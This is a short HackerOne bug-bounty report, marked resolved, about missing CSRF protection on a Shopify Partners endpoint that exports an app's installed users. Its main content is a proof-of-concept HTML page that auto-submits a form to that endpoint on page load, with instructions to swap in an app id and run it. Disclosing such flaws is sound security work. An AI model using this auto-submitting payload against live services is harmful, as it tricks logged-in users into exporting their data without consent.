Missing of csrf protection
Unknown
Vulnerability Details
<html>
<head><title>csrf</title></head>
<body onLoad="document.forms[0].submit()">
<form action="https://app.shopify.com/services/partners/api_clients/1105664/export_installed_users" method="GET">
</form>
</body>
</html>
change the 1105664 app id to your app id the save as html file and run
Actions
View on HackerOneReport Stats
- Report ID: 96470
- State: Closed
- Substate: resolved
- Upvotes: 9